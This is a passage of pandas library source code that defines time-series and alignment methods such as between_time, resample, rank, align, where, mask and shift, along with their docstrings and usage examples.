return self._take_with_is_copy(indexer, axis=axis)
def between_time(
self: FrameOrSeries,
start_time,
end_time,
include_start: bool_t = True,
include_end: bool_t = True,
axis=None,
) -> FrameOrSeries:
"""
Select values between particular times of the day (e.g., 9:00-9:30 AM).
By setting ``start_time`` to be later than ``end_time``,
you can get the times that are *not* between the two times.
Parameters
----------
start_time : datetime.time or str
Initial time as a time filter limit.
end_time : datetime.time or str
End time as a time filter limit.
include_start : bool, default True
Whether the start time needs to be included in the result.
include_end : bool, default True
Whether the end time needs to be included in the result.
axis : {0 or 'index', 1 or 'columns'}, default 0
Determine range time on index or columns value.
.. versionadded:: 0.24.0
Returns
-------
Series or DataFrame
Data from the original object filtered to the specified dates range.
Raises
------
TypeError
If the index is not a :class:`DatetimeIndex`
See Also
--------
at_time : Select values at a particular time of the day.
first : Select initial periods of time series based on a date offset.
last : Select final periods of time series based on a date offset.
DatetimeIndex.indexer_between_time : Get just the index locations for
values between particular times of the day.
Examples
--------
>>> i = pd.date_range('2018-04-09', periods=4, freq='1D20min')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts
A
2018-04-09 00:00:00 1
2018-04-10 00:20:00 2
2018-04-11 00:40:00 3
2018-04-12 01:00:00 4
>>> ts.between_time('0:15', '0:45')
A
2018-04-10 00:20:00 2
2018-04-11 00:40:00 3
You get the times that are *not* between two times by setting
``start_time`` later than ``end_time``:
>>> ts.between_time('0:45', '0:15')
A
2018-04-09 00:00:00 1
2018-04-12 01:00:00 4
"""
if axis is None:
axis = self._stat_axis_number
axis = self._get_axis_number(axis)
index = self._get_axis(axis)
try:
indexer = index.indexer_between_time(
start_time,
end_time,
include_start=include_start,
include_end=include_end,
)
except AttributeError as err:
raise TypeError("Index must be DatetimeIndex") from err
return self._take_with_is_copy(indexer, axis=axis)
def resample(
self,
rule,
axis=0,
closed: Optional[str] = None,
label: Optional[str] = None,
convention: str = "start",
kind: Optional[str] = None,
loffset=None,
base: int = 0,
on=None,
level=None,
) -> "Resampler":
"""
Resample time-series data.
Convenience method for frequency conversion and resampling of time
series. Object must have a datetime-like index (`DatetimeIndex`,
`PeriodIndex`, or `TimedeltaIndex`), or pass datetime-like values
to the `on` or `level` keyword.
Parameters
----------
rule : DateOffset, Timedelta or str
The offset string or object representing target conversion.
axis : {0 or 'index', 1 or 'columns'}, default 0
Which axis to use for up- or down-sampling. For `Series` this
will default to 0, i.e. along the rows. Must be
`DatetimeIndex`, `TimedeltaIndex` or `PeriodIndex`.
closed : {'right', 'left'}, default None
Which side of bin interval is closed. The default is 'left'
for all frequency offsets except for 'M', 'A', 'Q', 'BM',
'BA', 'BQ', and 'W' which all have a default of 'right'.
label : {'right', 'left'}, default None
Which bin edge label to label bucket with. The default is 'left'
for all frequency offsets except for 'M', 'A', 'Q', 'BM',
'BA', 'BQ', and 'W' which all have a default of 'right'.
convention : {'start', 'end', 's', 'e'}, default 'start'
For `PeriodIndex` only, controls whether to use the start or
end of `rule`.
kind : {'timestamp', 'period'}, optional, default None
Pass 'timestamp' to convert the resulting index to a
`DateTimeIndex` or 'period' to convert it to a `PeriodIndex`.
By default the input representation is retained.
loffset : timedelta, default None
Adjust the resampled time labels.
base : int, default 0
For frequencies that evenly subdivide 1 day, the "origin" of the
aggregated intervals. For example, for '5min' frequency, base could
range from 0 through 4. Defaults to 0.
on : str, optional
For a DataFrame, column to use instead of index for resampling.
Column must be datetime-like.
level : str or int, optional
For a MultiIndex, level (name or number) to use for
resampling. `level` must be datetime-like.
Returns
-------
Resampler object
See Also
--------
groupby : Group by mapping, function, label, or list of labels.
Series.resample : Resample a Series.
DataFrame.resample: Resample a DataFrame.
Notes
-----
See the `user guide
<https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#resampling>`_
for more.
To learn more about the offset strings, please see `this link
<https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#dateoffset-objects>`__.
Examples
--------
Start by creating a series with 9 one minute timestamps.
>>> index = pd.date_range('1/1/2000', periods=9, freq='T')
>>> series = pd.Series(range(9), index=index)
>>> series
2000-01-01 00:00:00 0
2000-01-01 00:01:00 1
2000-01-01 00:02:00 2
2000-01-01 00:03:00 3
2000-01-01 00:04:00 4
2000-01-01 00:05:00 5
2000-01-01 00:06:00 6
2000-01-01 00:07:00 7
2000-01-01 00:08:00 8
Freq: T, dtype: int64
Downsample the series into 3 minute bins and sum the values
of the timestamps falling into a bin.
>>> series.resample('3T').sum()
2000-01-01 00:00:00 3
2000-01-01 00:03:00 12
2000-01-01 00:06:00 21
Freq: 3T, dtype: int64
Downsample the series into 3 minute bins as above, but label each
bin using the right edge instead of the left. Please note that the
value in the bucket used as the label is not included in the bucket,
which it labels. For example, in the original series the
bucket ``2000-01-01 00:03:00`` contains the value 3, but the summed
value in the resampled bucket with the label ``2000-01-01 00:03:00``
does not include 3 (if it did, the summed value would be 6, not 3).
To include this value close the right side of the bin interval as
illustrated in the example below this one.
>>> series.resample('3T', label='right').sum()
2000-01-01 00:03:00 3
2000-01-01 00:06:00 12
2000-01-01 00:09:00 21
Freq: 3T, dtype: int64
Downsample the series into 3 minute bins as above, but close the right
side of the bin interval.
>>> series.resample('3T', label='right', closed='right').sum()
2000-01-01 00:00:00 0
2000-01-01 00:03:00 6
2000-01-01 00:06:00 15
2000-01-01 00:09:00 15
Freq: 3T, dtype: int64
Upsample the series into 30 second bins.
>>> series.resample('30S').asfreq()[0:5] # Select first 5 rows
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 1.0
2000-01-01 00:01:30 NaN
2000-01-01 00:02:00 2.0
Freq: 30S, dtype: float64
Upsample the series into 30 second bins and fill the ``NaN``
values using the ``pad`` method.
>>> series.resample('30S').pad()[0:5]
2000-01-01 00:00:00 0
2000-01-01 00:00:30 0
2000-01-01 00:01:00 1
2000-01-01 00:01:30 1
2000-01-01 00:02:00 2
Freq: 30S, dtype: int64
Upsample the series into 30 second bins and fill the
``NaN`` values using the ``bfill`` method.
>>> series.resample('30S').bfill()[0:5]
2000-01-01 00:00:00 0
2000-01-01 00:00:30 1
2000-01-01 00:01:00 1
2000-01-01 00:01:30 2
2000-01-01 00:02:00 2
Freq: 30S, dtype: int64
Pass a custom function via ``apply``
>>> def custom_resampler(array_like):
... return np.sum(array_like) + 5
...
>>> series.resample('3T').apply(custom_resampler)
2000-01-01 00:00:00 8
2000-01-01 00:03:00 17
2000-01-01 00:06:00 26
Freq: 3T, dtype: int64
For a Series with a PeriodIndex, the keyword `convention` can be
used to control whether to use the start or end of `rule`.
Resample a year by quarter using 'start' `convention`. Values are
assigned to the first quarter of the period.
>>> s = pd.Series([1, 2], index=pd.period_range('2012-01-01',
... freq='A',
... periods=2))
>>> s
2012 1
2013 2
Freq: A-DEC, dtype: int64
>>> s.resample('Q', convention='start').asfreq()
2012Q1 1.0
2012Q2 NaN
2012Q3 NaN
2012Q4 NaN
2013Q1 2.0
2013Q2 NaN
2013Q3 NaN
2013Q4 NaN
Freq: Q-DEC, dtype: float64
Resample quarters by month using 'end' `convention`. Values are
assigned to the last month of the period.
>>> q = pd.Series([1, 2, 3, 4], index=pd.period_range('2018-01-01',
... freq='Q',
... periods=4))
>>> q
2018Q1 1
2018Q2 2
2018Q3 3
2018Q4 4
Freq: Q-DEC, dtype: int64
>>> q.resample('M', convention='end').asfreq()
2018-03 1.0
2018-04 NaN
2018-05 NaN
2018-06 2.0
2018-07 NaN
2018-08 NaN
2018-09 3.0
2018-10 NaN
2018-11 NaN
2018-12 4.0
Freq: M, dtype: float64
For DataFrame objects, the keyword `on` can be used to specify the
column instead of the index for resampling.
>>> d = dict({'price': [10, 11, 9, 13, 14, 18, 17, 19],
... 'volume': [50, 60, 40, 100, 50, 100, 40, 50]})
>>> df = pd.DataFrame(d)
>>> df['week_starting'] = pd.date_range('01/01/2018',
... periods=8,
... freq='W')
>>> df
price volume week_starting
0 10 50 2018-01-07
1 11 60 2018-01-14
2 9 40 2018-01-21
3 13 100 2018-01-28
4 14 50 2018-02-04
5 18 100 2018-02-11
6 17 40 2018-02-18
7 19 50 2018-02-25
>>> df.resample('M', on='week_starting').mean()
price volume
week_starting
2018-01-31 10.75 62.5
2018-02-28 17.00 60.0
For a DataFrame with MultiIndex, the keyword `level` can be used to
specify on which level the resampling needs to take place.
>>> days = pd.date_range('1/1/2000', periods=4, freq='D')
>>> d2 = dict({'price': [10, 11, 9, 13, 14, 18, 17, 19],
... 'volume': [50, 60, 40, 100, 50, 100, 40, 50]})
>>> df2 = pd.DataFrame(d2,
... index=pd.MultiIndex.from_product([days,
... ['morning',
... 'afternoon']]
... ))
>>> df2
price volume
2000-01-01 morning 10 50
afternoon 11 60
2000-01-02 morning 9 40
afternoon 13 100
2000-01-03 morning 14 50
afternoon 18 100
2000-01-04 morning 17 40
afternoon 19 50
>>> df2.resample('D', level=0).sum()
price volume
2000-01-01 21 110
2000-01-02 22 140
2000-01-03 32 150
2000-01-04 36 90
"""
from pandas.core.resample import get_resampler
axis = self._get_axis_number(axis)
return get_resampler(
self,
freq=rule,
label=label,
closed=closed,
axis=axis,
kind=kind,
loffset=loffset,
convention=convention,
base=base,
key=on,
level=level,
)
def first(self: FrameOrSeries, offset) -> FrameOrSeries:
"""
Method to subset initial periods of time series data based on a date offset.
Parameters
----------
offset : str, DateOffset, dateutil.relativedelta
Returns
-------
subset : same type as caller
Raises
------
TypeError
If the index is not a :class:`DatetimeIndex`
See Also
--------
last : Select final periods of time series based on a date offset.
at_time : Select values at a particular time of the day.
between_time : Select values between particular times of the day.
Examples
--------
>>> i = pd.date_range('2018-04-09', periods=4, freq='2D')
>>> ts = pd.DataFrame({'A': [1,2,3,4]}, index=i)
>>> ts
A
2018-04-09 1
2018-04-11 2
2018-04-13 3
2018-04-15 4
Get the rows for the first 3 days:
>>> ts.first('3D')
A
2018-04-09 1
2018-04-11 2
Notice the data for 3 first calender days were returned, not the first
3 days observed in the dataset, and therefore data for 2018-04-13 was
not returned.
"""
if not isinstance(self.index, DatetimeIndex):
raise TypeError("'first' only supports a DatetimeIndex index")
if len(self.index) == 0:
return self
offset = to_offset(offset)
end_date = end = self.index[0] + offset
# Tick-like, e.g. 3 weeks
if not offset.is_anchored() and hasattr(offset, "_inc"):
if end_date in self.index:
end = self.index.searchsorted(end_date, side="left")
return self.iloc[:end]
return self.loc[:end]
def last(self: FrameOrSeries, offset) -> FrameOrSeries:
"""
Method to subset final periods of time series data based on a date offset.
Parameters
----------
offset : str, DateOffset, dateutil.relativedelta
Returns
-------
subset : same type as caller
Raises
------
TypeError
If the index is not a :class:`DatetimeIndex`
See Also
--------
first : Select initial periods of time series based on a date offset.
at_time : Select values at a particular time of the day.
between_time : Select values between particular times of the day.
Examples
--------
>>> i = pd.date_range('2018-04-09', periods=4, freq='2D')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts
A
2018-04-09 1
2018-04-11 2
2018-04-13 3
2018-04-15 4
Get the rows for the last 3 days:
>>> ts.last('3D')
A
2018-04-13 3
2018-04-15 4
Notice the data for 3 last calender days were returned, not the last
3 observed days in the dataset, and therefore data for 2018-04-11 was
not returned.
"""
if not isinstance(self.index, DatetimeIndex):
raise TypeError("'last' only supports a DatetimeIndex index")
if len(self.index) == 0:
return self
offset = to_offset(offset)
start_date = self.index[-1] - offset
start = self.index.searchsorted(start_date, side="right")
return self.iloc[start:]
def rank(
self: FrameOrSeries,
axis=0,
method: str = "average",
numeric_only: Optional[bool_t] = None,
na_option: str = "keep",
ascending: bool_t = True,
pct: bool_t = False,
) -> FrameOrSeries:
"""
Compute numerical data ranks (1 through n) along axis.
By default, equal values are assigned a rank that is the average of the
ranks of those values.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
Index to direct ranking.
method : {'average', 'min', 'max', 'first', 'dense'}, default 'average'
How to rank the group of records that have the same value (i.e. ties):
* average: average rank of the group
* min: lowest rank in the group
* max: highest rank in the group
* first: ranks assigned in order they appear in the array
* dense: like 'min', but rank always increases by 1 between groups.
numeric_only : bool, optional
For DataFrame objects, rank only numeric columns if set to True.
na_option : {'keep', 'top', 'bottom'}, default 'keep'
How to rank NaN values:
* keep: assign NaN rank to NaN values
* top: assign smallest rank to NaN values if ascending
* bottom: assign highest rank to NaN values if ascending.
ascending : bool, default True
Whether or not the elements should be ranked in ascending order.
pct : bool, default False
Whether or not to display the returned rankings in percentile
form.
Returns
-------
same type as caller
Return a Series or DataFrame with data ranks as values.
See Also
--------
core.groupby.GroupBy.rank : Rank of values within each group.
Examples
--------
>>> df = pd.DataFrame(data={'Animal': ['cat', 'penguin', 'dog',
... 'spider', 'snake'],
... 'Number_legs': [4, 2, 4, 8, np.nan]})
>>> df
Animal Number_legs
0 cat 4.0
1 penguin 2.0
2 dog 4.0
3 spider 8.0
4 snake NaN
The following example shows how the method behaves with the above
parameters:
* default_rank: this is the default behaviour obtained without using
any parameter.
* max_rank: setting ``method = 'max'`` the records that have the
same values are ranked using the highest rank (e.g.: since 'cat'
and 'dog' are both in the 2nd and 3rd position, rank 3 is assigned.)
* NA_bottom: choosing ``na_option = 'bottom'``, if there are records
with NaN values they are placed at the bottom of the ranking.
* pct_rank: when setting ``pct = True``, the ranking is expressed as
percentile rank.
>>> df['default_rank'] = df['Number_legs'].rank()
>>> df['max_rank'] = df['Number_legs'].rank(method='max')
>>> df['NA_bottom'] = df['Number_legs'].rank(na_option='bottom')
>>> df['pct_rank'] = df['Number_legs'].rank(pct=True)
>>> df
Animal Number_legs default_rank max_rank NA_bottom pct_rank
0 cat 4.0 2.5 3.0 2.5 0.625
1 penguin 2.0 1.0 1.0 1.0 0.250
2 dog 4.0 2.5 3.0 2.5 0.625
3 spider 8.0 4.0 4.0 4.0 1.000
4 snake NaN NaN NaN 5.0 NaN
"""
axis = self._get_axis_number(axis)
if na_option not in {"keep", "top", "bottom"}:
msg = "na_option must be one of 'keep', 'top', or 'bottom'"
raise ValueError(msg)
def ranker(data):
ranks = algos.rank(
data.values,
axis=axis,
method=method,
ascending=ascending,
na_option=na_option,
pct=pct,
)
ranks = self._constructor(ranks, **data._construct_axes_dict())
return ranks.__finalize__(self)
# if numeric_only is None, and we can't get anything, we try with
# numeric_only=True
if numeric_only is None:
try:
return ranker(self)
except TypeError:
numeric_only = True
if numeric_only:
data = self._get_numeric_data()
else:
data = self
return ranker(data)
_shared_docs[
"align"
] = """
Align two objects on their axes with the specified join method.
Join method is specified for each axis Index.
Parameters
----------
other : DataFrame or Series
join : {'outer', 'inner', 'left', 'right'}, default 'outer'
axis : allowed axis of the other object, default None
Align on index (0), columns (1), or both (None).
level : int or level name, default None
Broadcast across a level, matching Index values on the
passed MultiIndex level.
copy : bool, default True
Always returns new objects. If copy=False and no reindexing is
required then original objects are returned.
fill_value : scalar, default np.NaN
Value to use for missing values. Defaults to NaN, but can be any
"compatible" value.
method : {'backfill', 'bfill', 'pad', 'ffill', None}, default None
Method to use for filling holes in reindexed Series:
- pad / ffill: propagate last valid observation forward to next valid.
- backfill / bfill: use NEXT valid observation to fill gap.
limit : int, default None
If method is specified, this is the maximum number of consecutive
NaN values to forward/backward fill. In other words, if there is
a gap with more than this number of consecutive NaNs, it will only
be partially filled. If method is not specified, this is the
maximum number of entries along the entire axis where NaNs will be
filled. Must be greater than 0 if not None.
fill_axis : %(axes_single_arg)s, default 0
Filling axis, method and limit.
broadcast_axis : %(axes_single_arg)s, default None
Broadcast values along this axis, if aligning two objects of
different dimensions.
Returns
-------
(left, right) : (%(klass)s, type of other)
Aligned objects.
"""
@Appender(_shared_docs["align"] % _shared_doc_kwargs)
def align(
self,
other,
join="outer",
axis=None,
level=None,
copy=True,
fill_value=None,
method=None,
limit=None,
fill_axis=0,
broadcast_axis=None,
):
method = missing.clean_fill_method(method)
if broadcast_axis == 1 and self.ndim != other.ndim:
if isinstance(self, ABCSeries):
# this means other is a DataFrame, and we need to broadcast
# self
cons = self._constructor_expanddim
df = cons(
{c: self for c in other.columns}, **other._construct_axes_dict()
)
return df._align_frame(
other,
join=join,
axis=axis,
level=level,
copy=copy,
fill_value=fill_value,
method=method,
limit=limit,
fill_axis=fill_axis,
)
elif isinstance(other, ABCSeries):
# this means self is a DataFrame, and we need to broadcast
# other
cons = other._constructor_expanddim
df = cons(
{c: other for c in self.columns}, **self._construct_axes_dict()
)
return self._align_frame(
df,
join=join,
axis=axis,
level=level,
copy=copy,
fill_value=fill_value,
method=method,
limit=limit,
fill_axis=fill_axis,
)
if axis is not None:
axis = self._get_axis_number(axis)
if isinstance(other, ABCDataFrame):
return self._align_frame(
other,
join=join,
axis=axis,
level=level,
copy=copy,
fill_value=fill_value,
method=method,
limit=limit,
fill_axis=fill_axis,
)
elif isinstance(other, ABCSeries):
return self._align_series(
other,
join=join,
axis=axis,
level=level,
copy=copy,
fill_value=fill_value,
method=method,
limit=limit,
fill_axis=fill_axis,
)
else: # pragma: no cover
raise TypeError(f"unsupported type: {type(other)}")
def _align_frame(
self,
other,
join="outer",
axis=None,
level=None,
copy: bool_t = True,
fill_value=None,
method=None,
limit=None,
fill_axis=0,
):
# defaults
join_index, join_columns = None, None
ilidx, iridx = None, None
clidx, cridx = None, None
is_series = isinstance(self, ABCSeries)
if axis is None or axis == 0:
if not self.index.equals(other.index):
join_index, ilidx, iridx = self.index.join(
other.index, how=join, level=level, return_indexers=True
)
if axis is None or axis == 1:
if not is_series and not self.columns.equals(other.columns):
join_columns, clidx, cridx = self.columns.join(
other.columns, how=join, level=level, return_indexers=True
)
if is_series:
reindexers = {0: [join_index, ilidx]}
else:
reindexers = {0: [join_index, ilidx], 1: [join_columns, clidx]}
left = self._reindex_with_indexers(
reindexers, copy=copy, fill_value=fill_value, allow_dups=True
)
# other must be always DataFrame
right = other._reindex_with_indexers(
{0: [join_index, iridx], 1: [join_columns, cridx]},
copy=copy,
fill_value=fill_value,
allow_dups=True,
)
if method is not None:
left = self._ensure_type(
left.fillna(method=method, axis=fill_axis, limit=limit)
)
right = right.fillna(method=method, axis=fill_axis, limit=limit)
# if DatetimeIndex have different tz, convert to UTC
if is_datetime64tz_dtype(left.index):
if left.index.tz != right.index.tz:
if join_index is not None:
left.index = join_index
right.index = join_index
return left.__finalize__(self), right.__finalize__(other)
def _align_series(
self,
other,
join="outer",
axis=None,
level=None,
copy: bool_t = True,
fill_value=None,
method=None,
limit=None,
fill_axis=0,
):
is_series = isinstance(self, ABCSeries)
# series/series compat, other must always be a Series
if is_series:
if axis:
raise ValueError("cannot align series to a series other than axis 0")
# equal
if self.index.equals(other.index):
join_index, lidx, ridx = None, None, None
else:
join_index, lidx, ridx = self.index.join(
other.index, how=join, level=level, return_indexers=True
)
left = self._reindex_indexer(join_index, lidx, copy)
right = other._reindex_indexer(join_index, ridx, copy)
else:
# one has > 1 ndim
fdata = self._data
if axis == 0:
join_index = self.index
lidx, ridx = None, None
if not self.index.equals(other.index):
join_index, lidx, ridx = self.index.join(
other.index, how=join, level=level, return_indexers=True
)
if lidx is not None:
fdata = fdata.reindex_indexer(join_index, lidx, axis=1)
elif axis == 1:
join_index = self.columns
lidx, ridx = None, None
if not self.columns.equals(other.index):
join_index, lidx, ridx = self.columns.join(
other.index, how=join, level=level, return_indexers=True
)
if lidx is not None:
fdata = fdata.reindex_indexer(join_index, lidx, axis=0)
else:
raise ValueError("Must specify axis=0 or 1")
if copy and fdata is self._data:
fdata = fdata.copy()
left = self._constructor(fdata)
if ridx is None:
right = other
else:
right = other.reindex(join_index, level=level)
# fill
fill_na = notna(fill_value) or (method is not None)
if fill_na:
left = left.fillna(fill_value, method=method, limit=limit, axis=fill_axis)
right = right.fillna(fill_value, method=method, limit=limit)
# if DatetimeIndex have different tz, convert to UTC
if is_series or (not is_series and axis == 0):
if is_datetime64tz_dtype(left.index):
if left.index.tz != right.index.tz:
if join_index is not None:
left.index = join_index
right.index = join_index
return left.__finalize__(self), right.__finalize__(other)
def _where(
self,
cond,
other=np.nan,
inplace=False,
axis=None,
level=None,
errors="raise",
try_cast=False,
):
"""
Equivalent to public method `where`, except that `other` is not
applied as a function even if callable. Used in __setitem__.
"""
inplace = validate_bool_kwarg(inplace, "inplace")
# align the cond to same shape as myself
cond = com.apply_if_callable(cond, self)
if isinstance(cond, NDFrame):
cond, _ = cond.align(self, join="right", broadcast_axis=1)
else:
if not hasattr(cond, "shape"):
cond = np.asanyarray(cond)
if cond.shape != self.shape:
raise ValueError("Array conditional must be same shape as self")
cond = self._constructor(cond, **self._construct_axes_dict())
# make sure we are boolean
fill_value = bool(inplace)
cond = cond.fillna(fill_value)
msg = "Boolean array expected for the condition, not {dtype}"
if not isinstance(cond, ABCDataFrame):
# This is a single-dimensional object.
if not is_bool_dtype(cond):
raise ValueError(msg.format(dtype=cond.dtype))
elif not cond.empty:
for dt in cond.dtypes:
if not is_bool_dtype(dt):
raise ValueError(msg.format(dtype=dt))
cond = -cond if inplace else cond
# try to align with other
try_quick = True
if hasattr(other, "align"):
# align with me
if other.ndim <= self.ndim:
_, other = self.align(
other, join="left", axis=axis, level=level, fill_value=np.nan
)
# if we are NOT aligned, raise as we cannot where index
if axis is None and not all(
other._get_axis(i).equals(ax) for i, ax in enumerate(self.axes)
):
raise InvalidIndexError
# slice me out of the other
else:
raise NotImplementedError(
"cannot align with a higher dimensional NDFrame"
)
if isinstance(other, np.ndarray):
if other.shape != self.shape:
if self.ndim == 1:
icond = cond.values
# GH 2745 / GH 4192
# treat like a scalar
if len(other) == 1:
other = np.array(other[0])
# GH 3235
# match True cond to other
elif len(cond[icond]) == len(other):
# try to not change dtype at first (if try_quick)
if try_quick:
new_other = com.values_from_object(self)
new_other = new_other.copy()
new_other[icond] = other
other = new_other
else:
raise ValueError(
"Length of replacements must equal series length"
)
else:
raise ValueError(
"other must be the same shape as self when an ndarray"
)
# we are the same shape, so create an actual object for alignment
else:
other = self._constructor(other, **self._construct_axes_dict())
if axis is None:
axis = 0
if self.ndim == getattr(other, "ndim", 0):
align = True
else:
align = self._get_axis_number(axis) == 1
block_axis = self._get_block_manager_axis(axis)
if inplace:
# we may have different type blocks come out of putmask, so
# reconstruct the block manager
self._check_inplace_setting(other)
new_data = self._data.putmask(
mask=cond,
new=other,
align=align,
inplace=True,
axis=block_axis,
transpose=self._AXIS_REVERSED,
)
self._update_inplace(new_data)
else:
new_data = self._data.where(
other=other,
cond=cond,
align=align,
errors=errors,
try_cast=try_cast,
axis=block_axis,
)
return self._constructor(new_data).__finalize__(self)
_shared_docs[
"where"
] = """
Replace values where the condition is %(cond_rev)s.
Parameters
----------
cond : bool %(klass)s, array-like, or callable
Where `cond` is %(cond)s, keep the original value. Where
%(cond_rev)s, replace with corresponding value from `other`.
If `cond` is callable, it is computed on the %(klass)s and
should return boolean %(klass)s or array. The callable must
not change input %(klass)s (though pandas doesn't check it).
other : scalar, %(klass)s, or callable
Entries where `cond` is %(cond_rev)s are replaced with
corresponding value from `other`.
If other is callable, it is computed on the %(klass)s and
should return scalar or %(klass)s. The callable must not
change input %(klass)s (though pandas doesn't check it).
inplace : bool, default False
Whether to perform the operation in place on the data.
axis : int, default None
Alignment axis if needed.
level : int, default None
Alignment level if needed.
errors : str, {'raise', 'ignore'}, default 'raise'
Note that currently this parameter won't affect
the results and will always coerce to a suitable dtype.
- 'raise' : allow exceptions to be raised.
- 'ignore' : suppress exceptions. On error return original object.
try_cast : bool, default False
Try to cast the result back to the input type (if possible).
Returns
-------
Same type as caller
See Also
--------
:func:`DataFrame.%(name_other)s` : Return an object of same shape as
self.
Notes
-----
The %(name)s method is an application of the if-then idiom. For each
element in the calling DataFrame, if ``cond`` is ``%(cond)s`` the
element is used; otherwise the corresponding element from the DataFrame
``other`` is used.
The signature for :func:`DataFrame.where` differs from
:func:`numpy.where`. Roughly ``df1.where(m, df2)`` is equivalent to
``np.where(m, df1, df2)``.
For further details and examples see the ``%(name)s`` documentation in
:ref:`indexing <indexing.where_mask>`.
Examples
--------
>>> s = pd.Series(range(5))
>>> s.where(s > 0)
0 NaN
1 1.0
2 2.0
3 3.0
4 4.0
dtype: float64
>>> s.mask(s > 0)
0 0.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
>>> s.where(s > 1, 10)
0 10
1 10
2 2
3 3
4 4
dtype: int64
>>> df = pd.DataFrame(np.arange(10).reshape(-1, 2), columns=['A', 'B'])
>>> df
A B
0 0 1
1 2 3
2 4 5
3 6 7
4 8 9
>>> m = df %% 3 == 0
>>> df.where(m, -df)
A B
0 0 -1
1 -2 3
2 -4 -5
3 6 -7
4 -8 9
>>> df.where(m, -df) == np.where(m, df, -df)
A B
0 True True
1 True True
2 True True
3 True True
4 True True
>>> df.where(m, -df) == df.mask(~m, -df)
A B
0 True True
1 True True
2 True True
3 True True
4 True True
"""
@Appender(
_shared_docs["where"]
% dict(
_shared_doc_kwargs,
cond="True",
cond_rev="False",
name="where",
name_other="mask",
)
)
def where(
self,
cond,
other=np.nan,
inplace=False,
axis=None,
level=None,
errors="raise",
try_cast=False,
):
other = com.apply_if_callable(other, self)
return self._where(
cond, other, inplace, axis, level, errors=errors, try_cast=try_cast
)
@Appender(
_shared_docs["where"]
% dict(
_shared_doc_kwargs,
cond="False",
cond_rev="True",
name="mask",
name_other="where",
)
)
def mask(
self,
cond,
other=np.nan,
inplace=False,
axis=None,
level=None,
errors="raise",
try_cast=False,
):
inplace = validate_bool_kwarg(inplace, "inplace")
cond = com.apply_if_callable(cond, self)
# see gh-21891
if not hasattr(cond, "__invert__"):
cond = np.array(cond)
return self.where(
~cond,
other=other,
inplace=inplace,
axis=axis,
level=level,
try_cast=try_cast,
errors=errors,
)
_shared_docs[
"shift"
] = """
Shift index by desired number of periods with an optional time `freq`.
When `freq` is not passed, shift the index without realigning the data.
If `freq` is passed (in this case, the index must be date or datetime,
or it will raise a `NotImplementedError`), the index will be
increased using the periods and the `freq`.
Parameters
----------
periods : int
Number of periods to shift. Can be positive or negative.
freq : DateOffset, tseries.offsets, timedelta, or str, optional
Offset to use from the tseries module or time rule (e.g. 'EOM').
If `freq` is specified then the index values are shifted but the
data is not realigned. That is, use `freq` if you would like to
extend the index when shifting and preserve the original data.
axis : {0 or 'index', 1 or 'columns', None}, default None
Shift direction.
fill_value : object, optional
The scalar value to use for newly introduced missing values.
the default depends on the dtype of `self`.
For numeric data, ``np.nan`` is used.
For datetime, timedelta, or period data, etc. :attr:`NaT` is used.
For extension dtypes, ``self.dtype.na_value`` is used.
.. versionchanged:: 0.24.0
Returns
-------
%(klass)s
Copy of input object, shifted.
See Also
--------
Index.shift : Shift values of Index.
DatetimeIndex.shift : Shift values of DatetimeIndex.
PeriodIndex.shift : Shift values of PeriodIndex.
tshift : Shift the time index, using the index's frequency if
available.
Examples
--------
>>> df = pd.DataFrame({'Col1': [10, 20, 15, 30, 45],
... 'Col2': [13, 23, 18, 33, 48],
... 'Col3': [17, 27, 22, 37, 52]})
>>> df.shift(periods=3)
Col1 Col2 Col3
0 NaN NaN NaN
1 NaN NaN NaN
2 NaN NaN NaN
3 10.0 13.0 17.0
4 20.0 23.0 27.0
>>> df.shift(periods=1, axis='columns')
Col1 Col2 Col3
0 NaN 10.0 13.0
1 NaN 20.0 23.0
2 NaN 15.0 18.0
3 NaN 30.0 33.0
4 NaN 45.0 48.0
>>> df.shift(periods=3, fill_value=0)
Col1 Col2 Col3
0 0 0 0
1 0 0 0
2 0 0 0
3 10 13 17
4 20 23 27
"""
@Appender(_shared_docs["shift"] % _shared_doc_kwargs)
def shift(
self: FrameOrSeries, periods=1, freq=None, axis=0, fill_value=None
) -> FrameOrSeries:
if periods == 0:
return self.copy()
block_axis = self._get_block_manager_axis(axis)
if freq is None:
new_data = self._data.shift(
periods=periods, axis=block_axis, fill_value=fill_value
)
else:
return self.tshift(periods, freq)
return self._constructor(new_data).__finalize__(self)
def slice_shift(self: FrameOrSeries, periods: int = 1, axis=0) -> FrameOrSeries:
"""
Equivalent to `shift` without copying data.
The shifted data will not include the dropped periods and the
shifted axis will be smaller than the original.
Parameters
----------
periods : int
Number of periods to move, can be positive or negative.
Returns
-------
shifted : same type as caller
Notes
-----
While the `slice_shift` is faster than `shift`, you may pay for it
later during alignment.
"""
if periods == 0:
return self
if periods > 0:
vslicer = slice(None, -periods)
islicer = slice(periods, None)
else:
vslicer = slice(-periods, None)
islicer = slice(None, periods)
new_obj = self._slice(vslicer, axis=axis)
shifted_axis = self._get_axis(axis)[islicer]
new_obj.set_axis(shifted_axis, axis=axis, inplace=True)
return new_obj.__finalize__(self)
def tshift(
self: FrameOrSeries, periods: int = 1, freq=None, axis=0
) -> FrameOrSeries:
"""
Shift the time index, using the index's frequency if available.
Parameters
----------
periods : int
Number of periods to move, can be positive or negative.
freq : DateOffset, timedelta, or str, default None
Increment to use from the tseries module
or time rule expressed as a string (e.g. 'EOM').
axis : {0 or ‘index’, 1 or ‘columns’, None}, default 0
Corresponds to the axis that contains the Index.
Returns
-------
shifted : Series/DataFrame
Notes
-----
If freq is not specified then tries to use the freq or inferred_freq
attributes of the index. If neither of those attributes exist, a
ValueError is thrown
"""
index = self._get_axis(axis)
if freq is None:
freq = getattr(index, "freq", None)
if freq is None:
freq = getattr(index, "inferred_freq", None)
if freq is None:
msg = "Freq was not given and was not set in the index"
raise ValueError(msg)
if periods == 0:
return self
if isinstance(freq, str):
freq = to_offset(freq)
block_axis = self._get_block_manager_axis(axis)
if isinstance(index, PeriodIndex):
orig_freq = to_offset(index.freq)
if freq == orig_freq:
new_data = self._data.copy()
new_data.axes[block_axis] = index.shift(periods)
elif orig_freq is not None:
raise ValueError(
f"Given freq {freq.rule_code} does not match "
f"PeriodIndex freq {orig_freq.rule_code}"
